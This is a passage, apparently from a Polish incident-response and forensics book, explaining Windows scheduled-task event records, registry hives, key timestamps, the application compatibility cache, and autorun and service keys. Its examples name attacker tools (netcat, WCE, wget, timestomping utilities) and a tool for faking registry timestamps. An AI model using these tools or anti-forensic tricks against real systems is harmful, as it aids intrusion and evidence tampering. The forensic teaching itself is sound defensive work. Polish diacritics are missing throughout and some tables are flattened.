{3843A931-B021-98DC-2F3F-940C4EB09011}
zadania \At1
7 03/01/2012 Harmonogram zada uruchomi zadanie \At1, 129
10:05:00 wystpienie C:\Windows\SYSTEM32\cmd.exe
z identyfikatorem procesu 8192
8 03/01/2012 Harmonogram zada pomylnie ukoczy zadanie 201
10:05:00 \At1, wystpienie C:\Windows\SYSTEM32\
cmd.exe, akcja {3843A931-B021-98DC-2F3F-
940C4EB09011}
9 03/01/2012 Harmonogram zada pomylnie zakoczy 102
10:05:00 wystpienie {3843A931-B021-98DC-2F3F-
940C4EB09011} zadania \At1 dla uytkownika
CORPLOCAL\DCSERVER2008$
Zdarzenia wymienione w wierszach 1. i 2. nastpiy w wyniku utworzenia przez uytkownika

CORPDOMAIN\superuser nowego zadania zaplanowanego bez nazwy (At1) 1 marca 2012 roku
o godzinie 10:03:40 UTC. Zapisy przedstawione w pozostaych wierszach tabeli zawieraj
szczegowe informacje na temat przebiegu zadania, ktre zakoczyo si o godzinie 10:05:00.
Zwr uwag, e rekord zdarzenia o identyfikatorze 200 opisanego w wierszu 6. zawiera pen
ciek do pliku wykonanego przez zadanie At1 c:\windows\system32\drop.bat a wiersz 7.
zawiera identyfikator procesu tego, co zostao wykonane interpreter polece cmd.exe. Te kluczowe
informacje mog pomc w podjciu decyzji, czy podejrzana aktywno wymaga dalszego zbadania,
oraz zosta wykorzystane do utworzenia wskanikw zagroenia, gdyby obawy si potwierdziy.
Dziennik zdarze zabezpiecze rejestruje take przypadki utworzenia zada zaplanowanych
przy wczonej funkcji inspekcji procesw. (Jest to kolejny powd do tego, by wczy to niezwykle
przydatne ustawienie). W systemach Windows XP i Server 2003 zdarzenia utworzenia zada
zaplanowanych w dziennikach inspekcji procesw s rejestrowane pod identyfikatorem 602,
a w systemach Vista, Server 2008 i 7 pod identyfikatorem 4698. Poniej pokazano przykad
zapisu zdarzenia o identyfikatorze 602 z systemu Windows Server 2003:
Utworzone zaplanowane zadanie:
Nazwa pliku: C:\WINDOWS\Tasks\At1.job
Polecenie: C:\temp\test.exe
Wyzwalacze: At 3:03 AM on 3/10/2012.
Czas: 3/10/2012 3:03:00 AM
Flagi: 0x1A00002
Docelowy uytkownik: WEST\CorpAdmin
Przez:
Uytkownik: CorpAdmin
Domena:WEST
Identyfikator logowania:(0x0,0x230CA3)
Ten jeden rekord zawiera wszystkie kluczowe informacje o zadaniu zaplanowanym pen
ciek do polecenia, godzin jego wykonania oraz nazw uytkownika, ktry je utworzy.
REJESTR SYSTEMU WINDOWS

Rejestr jest podstawow baz danych konfiguracyjnych systemu operacyjnego Windows i dziaajcych
w nim aplikacji. Zosta utworzony po to, by mona byo si pozby niezliczonych plikw .ini i innych
tekstowych plikw konfiguracyjnych (czsto w niezgodnych ze sob formatach i nieprzewidywalnych
lokalizacjach), ktre programy musiay rozsiewa po caym systemie. Wraz ze wzrostem poziomu
zoonoci systemu operacyjnego i dziaajcych w nim programw zwikszya si te ilo
przechowywanych informacji a to oznacza wicej dowodw na potrzeby ledztwa.
Na temat ladw aktywnoci pozostawianych w rejestrze napisano ju cae ksiki. Dlatego
w podrozdziale tym przedstawiamy tylko podstawowe wiadomoci na temat struktury tej bazy
danych oraz troch kluczowej terminologii. Dalej opisujemy niektre najbardziej przydatne
rda dowodw w rejestrze, z ktrych sami wielokrotnie korzystalimy.
Dowody
Zaczniemy od przedstawienia rde dowodw skadajcych si na rejestr, tzn. opiszemy pliki i dane,
ktre naley pobra do analizy. Gdy ju poznasz ogln struktur rejestru, pokaemy rnice midzy
tym, jak jest przechowywany na dysku, a tym, jak uzyskuje si do niego dostp w dziaajcym
systemie. Nastpnie opiszemy metadane czasowe dostpne w rejestrze i sposoby wykorzystania
ich w ekspertyzach. Na kocu znajdziesz kilka ostrzee przed puapkami dotyczcymi tego,
jak aplikacje 32-bitowe korzystaj z rejestru w systemach 64-bitowych. Wyposaony w t wiedz
bdziesz mg przej do tego, co najlepsze do analizy danych.
Wprowadzenie do rejestru
Rejestr dzieli si na kilka gazi, w ktrych przechowywane s informacje dotyczce uytkownikw
i systemu. Kada ga jest przechowywana na dysku w postaci pliku. Pliki te s nieczytelne dla
czowieka, ale mona je przetwarza za pomoc rnych narzdzi, ktrych opis znajdziesz w tym
podrozdziale. Jak si przekonasz, gazie z danymi uytkownikw i systemowymi mog zawiera
mnstwo materiau dowodowego, wic naley zdoby je wszystkie. Jest to szczeglnie wane
w przypadkach, gdy interesujce nas konto uytkownika logowao si w systemie interaktywnie,
poniewa ga rejestru dotyczca tego konta moe zawiera cenne informacje o jego aktywnoci.
System Windows przechowuje pi gwnych gazi rejestru w katalogu %SYSTEMROOT%\
system32\config: SYSTEM, SECURITY, SOFTWARE, SAM oraz DEFAULT. S to nazwy plikw
reprezentujcych poszczeglne gazie zwr uwag na brak rozszerzenia. Szerzej o tych
gaziach i ich zawartoci piszemy dalej w tym podrozdziale.
Jak si zapewne spodziewasz, gazie rejestru dotyczce uytkownikw s przechowywane
w katalogach profili tych uytkownikw. Jednak dwie gazie tego typu, NTUSER.DAT
i USRCLASS.DAT, s przechowywane w rnych miejscach, w zalenoci od wersji systemu Windows.
Windows XP i Server 2003
\Documents and Settings\<user>\NTUSER.DAT
\Documents and Settings\<user>\Local Settings\Application
Data\Microsoft\Windows\USRCLASS.DAT
Windows Vista, 7 i Server 2008
\Users\<user>\NTUSER.DAT
\Users\<user>\AppData\Local\Microsoft\Windows\USRCLASS.DAT
Aby skopiowa gazie rejestru z dziaajcego systemu, naley uy specjalnego narzdzia z dostpem
do surowego dysku. Nie da si tak po prostu ich skopiowa za pomoc Eksploratora Windows.
Uwaga Pamitaj, e system Windows tylko przechowuje profile tych uytkownikw, ktrzy zalogowali si
interaktywnie. Jeeli uytkownik zalogowa si przez sie (np. podczas montowania udziau), system
nie utworzy dla niego katalogu z profilem ani gazi rejestru dla jego konta. W zwizku z tym brak
katalogu profilu uytkownika nie oznacza, e uytkownik ten nigdy nie uwierzytelnia si w systemie.
Informacje w rejestrze maj struktur drzewa, ktre mona podzieli na trzy skadniki: klucze,
wartoci i dane. Gdyby porwna t struktur do systemu plikw, klucze byyby ciekami
do katalogw, wartoci nazwami plikw, a dane zawartoci plikw.
Na rysunku 12.14 przedstawiono przykad klucza, wartoci i danych rejestru systemu Windows
w systemowym edytorze rejestru (regedit.exe). W przykadzie tym HKEY_LOCAL_MACHINE\
SOFTWARE\Krhonos\OpenCL\Vendors\ jest kluczem, nvcuda.dll jest wybran wartoci,
a 0x00000000(0) to dane.
RYSUNEK 12.14. Przykad klucza, wartoci i danych rejestru
Dane rejestru mog by zakodowane na rne sposoby. Z kad wartoci rejestr zapisuje pole
typu wartoci okrelajce struktur towarzyszcych mu danych. Jest wiele rnych typw, od prostych
liczb i acuchw po listy i nawet dane binarne. W efekcie niektre wartoci rejestru s czytelne dla
czowieka, a do odczytania innych potrzebne s specjalne narzdzia dekodujce. Dalej w tym podrozdziale
opisalimy kilka z tych narzdzi, a na kocu zamiecilimy zestawienie zalecanych programw do analizy
rejestru. Wicej informacji o typach wartoci rejestru mona znale na poniszej stronie internetowej.
W INTERNECIE
msdn.microsoft.com/en-us/library/windows/desktop/ms724884(v=vs.85).aspx
Gazie rejestru i mapowanie

Napisalimy wczeniej, e rejestr jest podzielony na wiele gazi reprezentowanych przez pliki,
ktre su do przechowywania informacji dotyczcych uytkownikw i systemu. Uruchomiony
system Windows mapuje zawarto tych gazi na struktur drzewa, ktrego pocztek stanowi
zbir kluczy gwnych. Jeli pobierze si zawarto rejestru z dziaajcego systemu, np. za pomoc
narzdzi do analizy na ywo, to najprawdopodobniej otrzyma si hierarchi kluczy przedstawion
poniej. Oto lista kluczy gwnych:
HKEY_LOCAL_MACHINE (zwany te HKLM),
HKEY_USERS (zwany te HKU),
HKEY_CURRENT_USER (zwany te HKCU),
HKEY_CURRENT_CONFIG (zwany te HKCC),
HKEY_CLASSES_ROOT.
Gdzie w tych kluczach s reprezentowane rne pliki gazi? Zaczniemy od klucza HKLM,
poniewa jest najprostszy: podklucze HKLM\Software, HKLM\Security, HKLM\System oraz
HKLM\SAM zawieraj odpowiednio tre gazi SOFTWARE, SECURITY, SYSTEM i SAM.
Klucz HKEY_USERS zawiera nastpujce podklucze.
HKU\.DEFAULT jest mapowany na ga DEFAULT.
HKU\{SID} jest tworzony dla kadego identyfikatora zabezpiecze uytkownika (SID)
w systemie. Podklucz kadego klucza SID odpowiada plikowi gazi rejestru NTUSER.DAT
odpowiedniego uytkownika.
HKU\{SID}_Classes jest tworzony dla kadego identyfikatora zabezpiecze SID uytkownika
w systemie. Podklucz kadego identyfikatora SID odpowiada plikowi gazi USRCLASS.DAT
danego uytkownika.
Klucz HKEY_CURRENT_USER to tylko dowizanie symboliczne do HKEY_USERS\{SID}\
dla uytkownika, ktry jest aktualnie zalogowany w konsoli.
Klucz HKEY_CURRENT_CONFIG jest mapowany na HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Hardware Profiles\XXXX, gdzie XXXX to czterocyfrowa liczba reprezentujca
aktywny profil. Element CurrentControlSet z tej cieki to cze wskazujce na HKLM\SYSTEM\
ControlSetXXX, gdzie XXX jest trzycyfrow liczb reprezentujc aktywny zestaw kontrolny konfiguracji.
I w kocu klucz HKEY_CLASSES_ROOT jest poczeniem podkluczy z HKLM\Software\Classes
i HKEY_CURRENT_USER\Software\Classes. Szczegowy opis sposobu tworzenia tego poczonego
widoku mona znale na poniszej stronie internetowej.
W INTERNECIE
msdn.microsoft.com/library/windows/desktop/ms724475.aspx
Nie prbuj wszystkiego zapamita, bo jest tego naprawd duo. Wystarczy tylko podczas
szukania danych w rejestrze systemowym wiedzie, e takie mapowanie ma miejsce. Jeli bdziesz
pracowa z plikami gazi z wyczonego systemu, nie znajdziesz adnej z tych wirtualnych
cieek, np. HKEY_CURENT_CONFIG czy HKEY_CURRENT_USER, i niektrych podkluczy, np.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet, ktre istniej tylko w dziaajcym systemie.
Znaczniki czasu rejestru

W odrnieniu od metadanych systemu plikw, klucze rejestru zawieraj tylko jeden znacznik
czasu. Kady klucz ma znacznik LastWriteTime, ktry jest ustawiany w chwili utworzenia tego
klucza, a nastpnie aktualizowany za kadym razem, gdy jakiekolwiek wartoci znajdujce si
bezporednio pod tym kluczem s dodawane, usuwane lub zmieniane.
Uwaga Zmiany w podkluczach nie maj wpywu na znacznik czasu ostatniej modyfikacji klucza nadrzdnego.
Przykadowo dodanie wartoci Test do klucza HKLM\Sciezka\Do\Przykladu\RegKey\ spowodowaoby
tylko modyfikacj znacznika czasu klucza RegKey, nie kluczy Sciezka, Do ani Przykladu.
Zwr uwag na brak znacznikw czasu utworzenia i ostatniego uycia. Ponadto rejestrowe
znaczniki czasu s zwizane tylko z kluczami, a nie z wartociami ani danymi. Ograniczenia te
sprawiaj, e bez dodatkowego kontekstu nie da si stwierdzi, czy znacznik LastWriteTime
klucza reprezentuje czas utworzenia tego klucza, czy jego aktualizacj, oraz nie ma moliwoci
dowiedzenia si, ktra warto w kluczu zostaa zmieniona. Analityk moe sprbowa
wydedukowa, jakie byo znaczenie ostatniej modyfikacji w kluczu poprzez przeanalizowanie
i skorelowanie innych faktw, np. dowodw pochodzcych z systemu plikw i dziennikw zdarze.
Przyjrzymy si np. znanemu kluczowi automatycznego uruchamiania okrelajcego programy
uruchamiane wraz z systemem operacyjnym:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\.
Warto Dane Klucz LastWriteTime

VMWare Tools C:\Program Files\VMware\VMware Tools\ 2012-08-30 02:34:30
VMwareTray.exe
Adobe Reader C:\Program Files\Adobe\Reader 9.0\Reader\ 2012-08-30 02:34:30
Speed Launcher Reader_sl.exe
winupdat C:\windows\addins\winupdat.exe 2012-08-30 02:34:30
W tabeli tej przedstawione s trzy wartoci klucza \Run\: VMWare Tools, Adobe Reader Speed
Launcher oraz winupdat. Ostatnia wydaje si podejrzana. Czy da si ustali, kiedy zostaa dodana
do rejestru bez posiadania dodatkowych materiaw? Znacznik czasu LastWriteTime w kadym
wierszu tabeli odnosi si do tego samego klucza zawierajcego wszystkie te trzy wartoci i ulegnie
modyfikacji, gdy zmieni si ktra z tych wartoci lub co w zawartych w nich danych (albo gdy
zostanie dodana lub usunita jaka warto). Oczywicie gdybymy mieli dostp do metadanych
systemu plikw lub innych informacji pozwalajcych dowie, e plik
C:\windows\addins\winupdat.exe zosta utworzony dnia 2012-08-30 o godzinie 02:34:30 lub w jej
pobliu w okresie aktywnoci hakera, moglibymy wycign poparty mocnymi dowodami wniosek,
e klucz ten zosta zmodyfikowany z powodu dodania wartoci winupdat.
Brak szczegowych informacji czasowych w rejestrze ma jeszcze jedn wad system Windows
czsto aktualizuje znacznik czasu LastWriteTime podczas aktualizacji systemu i instalacji dodatkw
serwisowych, a czasami nawet w wyniku ponownego uruchomienia komputera, z ktrym zawsze
wie si modyfikacja duej iloci kluczy rejestru. Zdarzenia takie czsto s wyranie widoczne
podczas analizy osi czasu rejestru i filtrowania kluczy wg znacznika LastWriteTime. Jeli zauwaysz,
e w tej samej sekundzie lub minucie zostao zaktualizowanych wiele kluczy zwaszcza w jednej
ciece lub hierarchii cieek to prawdopodobnie znalaze lady zmian wprowadzonych przez
system operacyjny, aktualizacj oprogramowania lub jak aplikacj zabezpieczajc, np. program
antywirusowy.
A co z celowym zmienianiem znacznika LastWriteTime? W podrozdziale o systemie plikw

NTFS i jego metadanych opisalimy technik zwan time stomping stosowan przez hakerw
w celu zmieniania znacznikw czasu plikw, aby zatrze lady i utrudni ledztwo. W interfejsie
API systemu Windows nie ma metody umoliwiajcej zmienianie znacznika czasu ostatniej
modyfikacji kluczy rejestru, podobnej do funkcji SetFileTime przeznaczonej do zmieniania
metadanych plikowych. W efekcie hakerzy rzadko prbuj bezporednio modyfikowa znaczniki
czasu rejestru. Niemniej jednak na razie istnieje przynajmniej jedno skuteczne narzdzie, ktre
udowodnio, e aplikacja majca uprawnienia systemowe moe ustawi znacznik czasu klucza
rejestru na dowoln warto. Czas pokae, czy ta technika zacierania ladw zyska wiksz
popularno. Wicej na temat tego narzdzia (SetRegTime Joakima Schichta) mona znale
pod poniszym adresem.
W INTERNECIE
code.google.com/p/mft2csv/wiki/SetRegTime
Odbijanie i przekierowywanie w rejestrze

Zanim przejdziemy do opisu niektrych przydatnych kluczy rejestru, musisz jeszcze dowiedzie si
o odbijaniu i przekierowywaniu w rejestrze. Podsystem WoW64 systemu Windows, zapewniajcy
zgodno aplikacji 32-bitowych z 64-bitowym systemem operacyjnym, odbija lub przekierowuje
prby 32-bitowych aplikacji dostania si do niektrych cieek rejestru. Odbywa si to w sposb
niewidoczny dla aplikacji, ktra moe korzysta z tych samych zakodowanych na stae cieek
rejestru, ktrych uywaaby, gdyby dziaaa w 32-bitowym systemie operacyjnym.
Sposb dziaania tego mechanizmu przedstawimy na przykadzie jednej z najczciej uywanych
cieek. W 64-bitowych wersjach systemu Windows aplikacje 64-bitowe korzystaj ze cieki rejestru
HKEY_LOCAL_MACHINE\SOFTWARE\. Aplikacje 32-bitowe mog prbowa uy tej samej cieki,
ale podsystem WoW64 przekieruje je niepostrzeenie do cieki HKEY_LOCAL_MACHINE\
SOFTWARE\WoW6432Node\. Firma Microsoft opublikowaa list wszystkich takich przekierowa
w portalu MSDN, w artykule pt. Registry Keys Affected by WOW64 wszystkie s utworzone wg
tego samego wzoru, tzn. przez dodanie czonu WOW6432Node do kluczy dla aplikacji 32-bitowych.
W INTERNECIE
Aby nie byo za atwo, w wersjach systemu Windows starszych od Windows Server 2008 R2
i Windows 7 podsystem WoW64 wykonuje odbijanie zamiast (a czasami w dodatku do)
przekierowywania. Proces odbijania polega na synchronizacji kopii tych podkluczy rejestru,
wartoci oraz zawartych w nich danych, ktre musz by takie same w 32- i 64-bitowym widoku
rejestru. Bardziej szczegowy opis tego procesu znajduje si w artykule pt. Registry Reflection.
W INTERNECIE
Procesy przekierowywania i odbijania mog mie znaczny wpyw na ledztwo. Jeli uyjemy
32-bitowego narzdzia do zbierania i analizowania danych z rejestru w dziaajcych systemie,
moemy przeoczy cae zbiory podkluczy, ktre podsystem WoW64 uczyni niedostpnymi.
Analogicznie, naley zna znaczenie cieek rejestru pod podkluczami z czonem Wow6432Node.
ktre mona napotka podczas analizy osi czasu i innych rodzajw analiz.
Analiza
Jakiego rodzaju informacje mona w takim razie wydoby z rejestru? Lepiej jednak byoby chyba
spyta, czego nie mona stamtd wydoby? W tym punkcie opisujemy niektre klucze i wartoci,
ktre okazay si najbardziej przydatne w naszych ledztwach. Dla uatwienia podzielilimy go
na nastpujce cztery podpunkty.
Klucze rejestru dotyczce konfiguracji systemu.
Bufor danych o zgodnoci aplikacji.
Klucze rejestru dotyczce automatycznego uruchamiania aplikacji.
Klucze rejestru gazi uytkownika.
Klucze rejestru dotyczce konfiguracji systemu

System Windows mona konfigurowa za pomoc Panelu sterowania i kilku innych narzdzi
z graficznym interfejsem uytkownika. Na szczcie wiele z tych ustawie jest przechowywanych
w uporzdkowany sposb w jednym miejscu w rejestrze, oczywicie. Przegldajc odpowiednie
klucze, mona dowiedzie si wszystkiego, od daty instalacji systemu operacyjnego po aktualnie
stosowan zasad zapory sieciowej i przynaleno uytkownikw do grup. Trzeba tylko wiedzie, gdzie
szuka, a biorc pod uwag rozmiar i poziom zoonoci rejestru, nie jest to wcale takie oczywiste.
W tabelach na nastpnych stronach znajduje si zestawienie kluczy rejestru, ktre naszym zdaniem
zawieraj najbardziej przydatne informacje o systemie, sieci, uytkownikach i zabezpieczeniach.
Niektre z nich s zakodowane i trudne do odczytania w takich przypadkach dodalimy
odnoniki do dodatkowych rde. Poza tym na kocu podrozdziau powiconego rejestrowi
zamiecilimy opis rnych narzdzi analitycznych, ktre bardzo uatwiaj prac.
W dziaajcym systemie dostp do klucza HKLM\Security\Policy ma tylko uytkownik SYSTEM.
Aby nauczy si rozszyfrowywa tre wartoci PolAdtEv, przeczytaj artyku How To Determine Audit
Policies from the Registry (Jak odczytywa zasady zabezpiecze z rejestru) pod poniszym adresem.
W INTERNECIE
Podstawowe informacje o systemie

Klucz Wartoci Opis
HKLM\System\ Computername, Warto Computername zawiera nazw
CurrentControlSet\ ActiveComputername komputera. Moe si ona rni od
Control\Computername\ wartoci ActiveComputername, jeli
nazwa komputera zostaa zmieniona,
ale komputer nie zosta jeszcze
ponownie uruchomiony
HKLM\Software\ ProductName, CurrentVersion, Podstawowe informacje o wersji
Microsoft\Windows NT\ SubVersionNumber, systemu Windows (wcznie
Currentversion\ CSDVersion, InstallDate, z dodatkami serwisowymi),
SystemRoot, (...) data instalacji systemu, cieka
do katalogu gwnego systemu
(np. C:\Windows) itd.
HKLM\System\ DaylightName, DaylightStart, Strefa czasowa i rnica wzgldem
CurrentControlSet\ DaylightBias, StandardName, UTC
Control\ StandardStart, StandardBias,
TimeZoneInformation\ Bias, ActiveTimeBias
HKLM\Software\ {Wiele} Lista zainstalowanych aplikacji
Microsoft\Windows\ widocznych na licie
Currentversion\Uninstall\ Dodaj/usu programy
{Nazwa_apikacji}
HKLM\System\ {Wiele} Podklucze dla kadego wymiennego
CurrentControlSet\Enum\ nonika USB podczonego do
USBSTOR\ systemu. Wrd informacji mona
znale numer seryjny, nazw
producenta i inne dane
HKLM\System\ {Wiele wartoci dla kadego Kade urzdzenie z przypisan
MountedDevices\ numeru napdu} liter napdu ma dwie wartoci
(np. \DosDevices\C:
i \??\Volume{GUID})
KU\{SID}\Software\ ND Podklucz tworzony dla kadego
Microsoft\Windows\ identyfikatora GUID woluminu
CurrentVersion\Explorer\ podczonego przez uytkownika.
MountPoints2\{GUID} Moe korelowa z wartociami
w kluczu HKLM\System\
MountedDevices\
Podstawowe informacje o systemie

Klucz Wartoci Opis
HKLM\System\ DhcpServer, NameServer, Podklucze klucza \Interfaces\ dla
CurrentControlSet\Services\ IPAddress, kadego interfejsu TCP/IP. Wartoci
Tcpip\Parameters\Interfaces\ DefaultGateway, (...) tych podkluczy zawieraj informacje
{nazwa-interfejsu}\ o konfiguracji karty sieciowej
HKLM\Software\ Category, DateCreated, Profile sieci, z ktrymi system czy
Microsoft\Windows NT\ DateLastConnected, si wczeniej. W przypadku sieci
CurrentVersion\NetworkList\ Description, bezprzewodowych wartoci
Profiles\{GUID}\ ProfileName, (...) ProfileName i (lub) Description
zazwyczaj zgadzaj si z SSID
HKLM\System\ {Nazwa_Udziau} Po jednej wartoci na udzia lokalny.
CurrentControlSet\Services\ Dane kadej z tych wartoci zawieraj
LanmanServer\Shares\ ciek do udziau
HKLM\System\ {Wiele} Podklucze dotyczce ustawie
CurrentControlSet\Services\ zapory sieciowej systemu Windows
SharedAccess\Parameters\ w profilach standardowym,
FirewallPolicy\ publicznym i domenowym
Informacje o uytkownikach i dotyczce zabezpiecze

Klucz Wartoci Opis
HKLM\Security\Policy\ PolAdtEv, PolAcDmS, Ustawienia zasady inspekcji
PolPrDmS, PolPrDmN zabezpiecze, SID komputera,
SID domeny oraz nazwa domeny
HKLM\Software\Microsoft\ ProfileImagePath Podklucze dla kadego SID
Windows NT\ uytkownika, ktry logowa si do
CurrentVersion\ systemu. Warto ProfileImagePath
ProfileList\{SID}\ pod danym podkluczem zawiera
ciek do folderu profilu
uytkownika, co umoliwia
powizanie SID z nazw uytkownika
HKLM\Software\Microsoft\ Group# Podklucze dla kadego SID
Windows\CurrentVersion\ uytkownika w GroupMembership
Group Policy\{SID}]\ kada warto Group# okrela SID
GroupMembership\ grupy, do ktrej naley uytkownik
List najczciej uywanych identyfikatorw SID mona znale w artykule Well-known

security identifiers in Windows operating systems (Znane identyfikatory zabezpiecze w systemach
operacyjnych Windows).
W INTERNECIE
Bufor danych o zgodnoci aplikacji

W buforze danych o zgodnoci aplikacji system Windows rejestruje dane plikw wykonywalnych
i skryptw, ktre mog do prawidowego dziaania wymaga specjalnych ustawie zgodnoci.
Rozkodowana tre tego klucza rni si w zalenoci od wersji systemu Windows i moe zawiera
nastpujce informacje:
nazw pliku wykonywalnego lub skryptu i pen ciek do niego,
standardow dat modyfikacji,
rozmiar w bajtach,
czy plik by uruchamiany w tym systemie.
Bufor jest obsugiwany w pamici jdra i serializowany do rejestru w chwili zamykania
systemu. Lokalizacja tego klucza rni si w zalenoci od wersji systemu Windows.
Windows Vista, Windows 7, Server 2003 i Server 2008 HKLM\SYSTEM\
CurrentControlSet\Control\Session Manager\AppCompatCache\AppCompatCache
Windows XP HKLM\CurrentControlSet\Control\Session Manager\
AppCompatibility\AppCompatCache
Co takiego zawiera bufor danych o zgodnoci aplikacji, czego nie mona znale w innych
rdach informacji o wykonywaniu programw, takich jak pliki pobierane z wyprzedzeniem?
Jedn z jego zalet jest to, e moe zawiera wicej wpisw ni pliki pobierane z wyprzedzeniem,
ktrych limit to 128 plikw systemy Windows 7 i Windows Server 2008 przechowuj do 1024
wpisw, a starsze wersje systemu przechowuj do 512 wpisw. Ponadto system Windows przetwarza
i dodaje pliki wykonywalne do bufora, gdy zmieni si metadane i cieki pliku bez wzgldu na to,
czy plik ten zosta uruchomiony. Innymi sowy, bufor danych o zgodnoci aplikacji moe zawiera
lady plikw wykonywalnych, ktre nigdy nie zostay uruchomione w danym systemie.
Wicej informacji na temat sposobu zapisywania i przechowywania tych danych przez rne
wersje systemu Windows mona znale w doskonaej biaej ksidze napisanej przez Andrew Davisa
pt. Leveraging the Application Compatibility Cache in Forensic Investigations (Sposoby wykorzystania
bufora danych o zgodnoci aplikacji w ledztwie). Ponadto Davis utworzy narzdzie o nazwie
ShimCacheParser.py do dekodowania treci bufora pobranej z dziaajcego systemu, gazi rejestru
i w innych formatach. Opisywane publikacj i narzdzie mona znale pod poniszymi adresami.
W INTERNECIE
Biaa ksiga www.mandiant.com/library/Whitepaper_ShimCacheParser.pdf
Parser bufora danych o zgodnoci aplikacji github.com/mandiant/ShimCacheParser
W poniszej tabeli przedstawiamy wycig z wynikw zwrconych przez skrypt ShimCacheParser.py

w 32-bitowym systemie Windows 7. Zwr uwag na brak w tych danych dat ostatnich aktualizacji
i rozmiarw plikw. Jest to spowodowane tym, e w kadej wersji systemu Windows bufor danych
o zgodnoci aplikacji jest zaimplementowany w inny sposb.
Data ostatniej Data ostatniej Znacznik

cieka Rozmiar pliku
modyfikacji aktualizacji wykonania
07/14/09 Brak danych C:\Windows\system32\ Brak danych TRUE
01:14:28 PING.EXE
01:14:45 whoami.exe
07/14/09 Brak danych C:\Windows\System32\ Brak danych TRUE
01:14:27 net.exe
05/22/12 Brak danych c:\Windows\addins\rar.exe Brak danych TRUE
04:41:52
11/20/10 Brak danych c:\Windows\addins\wce.exe Brak danych TRUE
21:29:12
21:29:19 findstr.exe
11/20/10 Brak danych c:\Windows\addins\nc.exe Brak danych TRUE
21:29:12
01/24/12 Brak danych c:\Windows\addins\ Brak danych TRUE
13:45:36 setMACE.exe
05/22/12 Brak danych c:\Windows\addins\wget.exe Brak danych TRUE
04:41:30
Skrypt ShimCacheParser.py zachowuje oryginaln kolejno wpisw z bufora, tzn. wiersze s

posortowane od ostatnio dodanego lub zaktualizowanego. Cho nie istnieje formalna dokumentacja
informujca o tym, ktre czynnoci powoduj aktualizacj wpisw w buforze, z naszych dowiadcze
wynika, e efekt ten wywouj zdarzenia uruchomienia i utworzenia pliku.
Jak napisalimy wczeniej, data ostatniej modyfikacji w buforze danych o zgodnoci aplikacji
pochodzi z atrybutu Standard Information pliku. Zaobserwowalimy, e jeli kto zmieni t dat
w nielegalny sposb, we wpisie bufora rwnie znajdzie si zmieniony znacznik czasu. Ponadto
w podrozdziale o systemie plikw NTFS pisalimy, e znacznik czasu ostatniej modyfikacji nie
musi wskazywa daty utworzenia pliku. W niektrych przypadkach data ta moe pochodzi
z systemu lub nonika rdowego.
Klucze automatycznego uruchamiania

Klucze automatycznego uruchamiania, zwane te punktami rozszerzenia autostartu lub kluczami
mechanizmu trwaoci, zapewniaj automatyczne adowanie plikw wykonywalnych systemu
Windows, bibliotek DLL i innych skadnikw podczas uruchamiania systemu, logowania
uytkownika i w pewnych innych sytuacjach. Hakerzy czsto modyfikuj w rejestrze klucze
automatycznego wykonywania lub dodaj nowe klucze, aby ich szkodliwe programy byy
uruchamiane wraz z systemem. Dlatego te naley zna sposoby konfiguracji tych automatw,
wiedzie, do czego su oraz jak hakerzy mog je wykorzysta.
Na szczcie programistw oraz twrcw szkodliwych programw i nieszczcie analitykw, takich
jak my, rejestr systemu Windows zawiera wiele miejsc do przechowywania informacji niektre
z nich wci nie s opisane w adnej dokumentacji. Mamy za mao miejsca, aby wymieni tu
wszystkie znane klucze tego typu. Dlatego skoncentrujemy si na tych, ktre naszym zdaniem s
najczciej wykorzystywane przez hakerw. Przedstawiamy dowody i przeznaczenie kadego z tych
kluczy, aby byo wiadomo, gdzie ich szuka i jak je analizowa. Dalej opisujemy te oglne techniki
analizy do szybkiego przegldania kluczy automatycznego uruchamiania, identyfikowania
podejrzanych wpisw oraz ich sortowania.
Usugi systemu Windows

Usugi s najczciej wykorzystywanym mechanizmem do zapisywania danych przez system
Windows. Dziaaj w tle i nie wymagaj jakiejkolwiek interakcji z uytkownikiem. Mog by
uruchamiane automatycznie wraz z systemem, przez jakie zdarzenie lub rcznie. Usuga moe
posugiwa si rnymi uprawnieniami, np. uytkownika lokalnego, uytkownika domeny
albo konta systemowego. W przecitnym systemie Windows dziaaj dziesitki legalnych usug
wspomagajcych podstawowe funkcje systemu np. rejestrowanie zdarze w dziennikach,
udostpnianie plikw czy DHCP. Sterowniki urzdze systemu Windows wany rodzaj
oprogramowania systemowego umoliwiajcy wspprac ze sprztem rwnie mog by
adowane jako usugi (cho s zaprojektowane i adowane troch inaczej ni zwyke usugi).
W kocu take zewntrzne aplikacje mog instalowa usugi, aby zapewni cige dziaanie
w tle wybranych skadnikw (typowymi przykadami s sterowniki drukarki i skanera).
Usugi najczciej dziaaj pod kontrol jednego z trzech wbudowanych kont obecnych
w kadym systemie Windows. Oto one.
System lokalny uytkownik ten ma pen i nieograniczon kontrol nad systemem
(lub domen Active Directory w przypadku kontrolera domeny). Haker, ktry zdobdzie
usug dziaajc w tym kontekcie, moe zrobi wszystko.
Usuga sieciowa konto o uprawnieniach podobnych do uprawnie zwykego

uytkownika z grupy Uytkownicy z moliwoci dokonywania uwierzytelniania przez sie
przy uyciu konta komputera.
Usuga lokalna najbardziej restrykcyjny kontekst, w ktrym nie ma dostpu do zasobw
sieciowych jako konto komputera. Oczywicie usuga moe dziaa pod kontrol dowolnego
konta lokalnego lub domenowego, pod warunkiem e uprawnienia tych kont s wystarczajce
do prawidowego dziaania tej usugi.
Uwaga Firma Microsoft przestrzega przed wykorzystywaniem kont domenowych z duymi uprawnieniami,
zwaszcza administratorw domen, do wykonywania usug. Jeli haker przejmie kontrol nad
usug lub wykradnie jej dane powiadczajce tosamo, od razu bdzie mg korzysta z tych
wszystkich uprawnie. Sytuacje takie maj miejsce w przypadkach wama na serwer SQL,
serwery sieciowe i do innych le skonfigurowanych usug aplikacji.
Jak wyglda konfiguracja usug w rejestrze? Kada usuga ma wasny zbir wartoci i podkluczy
w kluczu HKLM\CurrentControlSet\services\{nazwausugi}\, w ktrym czon {nazwausugi}
reprezentuje krtk nazw danej usugi. Dziaaniem kadej usugi moe sterowa kilka rnych
wartoci i podkluczy. Poniej znajduje si lista najwaniejszych z nich.
W INTERNECIE
Firma Microsoft opisaa wszystkie wartoci kluczy i wywoywane przez nie efekty na stronie
support.microsoft.com/kb/103000.
DisplayName duga deskryptywna nazwa usugi mogca zawiera spacje oraz due
i mae litery. Maksymalna dugo to 256 znakw.
Description komentarz opisujcy sposb dziaania lub przeznaczenie usugi.
